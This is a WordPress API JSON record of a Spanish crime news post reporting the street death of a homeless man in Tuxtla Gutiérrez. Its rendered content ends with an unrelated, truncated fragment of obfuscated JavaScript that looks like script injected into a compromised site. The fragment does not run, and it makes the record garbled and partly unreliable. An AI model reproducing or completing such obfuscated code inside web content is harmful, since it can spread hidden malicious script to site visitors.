{"id":19644,"date":"2025-01-08T04:08:26","date_gmt":"2025-01-08T04:08:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19644"},"modified":"2025-01-08T04:08:27","modified_gmt":"2025-01-08T04:08:27","slug":"pierde-la-vid-enfermo-alcoholico-en-la-via-publica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19644","title":{"rendered":"Pierde la vid@ enfermo alcoh\u00f3lico en la v\u00eda p\u00fablica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250107-WA0042-1024x768.jpg\" alt=\"\" class=\"wp-image-19645\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250107-WA0042-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250107-WA0042-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250107-WA0042-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250107-WA0042.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 7 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un integrante del Escuadr\u00f3n de la Muerte perdi\u00f3 la vid@ este martes por la tarde, a la altura de la 13 Oriente y privada de la 10a Sur de la Colonia Maldonado de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, el hombre de unos 50 a\u00f1os de edad, fue reportado por los propios vecinos del lugar.<\/p>\n\n\n\n<p>Informaron que el hombre pernoctaba en este lugar e inger\u00eda bebidas alcoh\u00f3licas con sus compa\u00f1eros.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja Mexicana para atender la situaci\u00f3n y tras una revisi\u00f3n se dio a conocer que el sujeto hab\u00eda perdido la vid@.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 7 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un integrante del Escuadr\u00f3n de la Muerte perdi\u00f3 la vid@ este martes por la tarde, a la altura de la 13 Oriente y privada de la 10a Sur de la Colonia Maldonado de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, el hombre de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19645,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19644","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19644","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19644"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19644\/revisions"}],"predecessor-version":[{"id":19646,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19644\/revisions\/19646"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19645"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19644"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19644"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19644"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}